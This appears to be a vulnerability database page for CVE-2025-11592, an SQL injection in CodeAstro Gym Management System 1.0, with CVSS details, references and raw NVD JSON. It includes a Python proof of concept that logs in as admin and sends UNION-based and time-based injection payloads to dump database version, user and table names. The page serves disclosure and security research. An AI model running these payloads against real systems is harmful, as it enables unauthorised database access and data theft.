CVE-2025-11592

Description

A vulnerability was detected in CodeAstro Gym Management System 1.0. This affects an unknown part of the file /admin/edit-equipmentform.php. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

CodeAstro Gym Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11592 PoC - SQL Injection in CodeAstro Gym Management System
# Vulnerable file: /admin/edit-equipmentform.php
# Vulnerable parameter: ID

import requests

# Target configuration
TARGET_URL = "http://target.com"
ADMIN_PATH = "/admin/edit-equipmentform.php"
USERNAME = "admin"
PASSWORD = "password"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login as admin (low privilege required)
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "login": "submit"
}
login_url = f"{TARGET_URL}/admin/"
session.post(login_url, data=login_data)

# Step 2: Exploit SQL Injection via ID parameter
# Payload to extract database version
sqli_payload = "1' UNION SELECT 1,version(),database(),user(),5-- -"
inject_url = f"{TARGET_URL}{ADMIN_PATH}?id={sqli_payload}"

response = session.get(inject_url)
print(f"Status Code: {response.status_code}")
print(f"Response Length: {len(response.text)}")

# Step 3: Extract sensitive data using boolean-based or time-based techniques
# Time-based blind SQLi payload
time_payload = "1' AND SLEEP(5)-- -"
time_url = f"{TARGET_URL}{ADMIN_PATH}?id={time_payload}"

import time
start_time = time.time()
response = session.get(time_url)
elapsed_time = time.time() - start_time
print(f"Time elapsed: {elapsed_time:.2f} seconds")
if elapsed_time > 4:
    print("[+] SQL Injection confirmed via time-based technique")

# Step 4: Extract database information
info_payload = "1' UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- -"
info_url = f"{TARGET_URL}{ADMIN_PATH}?id={info_payload}"
response = session.get(info_url)
print(f"Database tables info: {response.text[:500]}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11592
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11592
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11592/
[4] VulDB https://vuldb.com/cve/CVE-2025-11592
[5] https://codeastro.com/
[6] https://github.com/coppeliaz/cve/issues/5
[7] https://vuldb.com/?ctiid.327913
[8] https://vuldb.com/?id.327913
[9] https://vuldb.com/?submit.671740
[10] https://github.com/coppeliaz/cve/issues/5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11592", "sourceIdentifier": "[email protected]", "published": "2025-10-11T07:15:37.423", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in CodeAstro Gym Management System 1.0. This affects an unknown part of the file /admin/edit-equipmentform.php. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BDAFA95-39E9-4D93-9228-7D9B51DE6A3F"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/coppeliaz/cve/issues/5", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327913", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327913", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671740", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/coppeliaz/cve/issues/5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}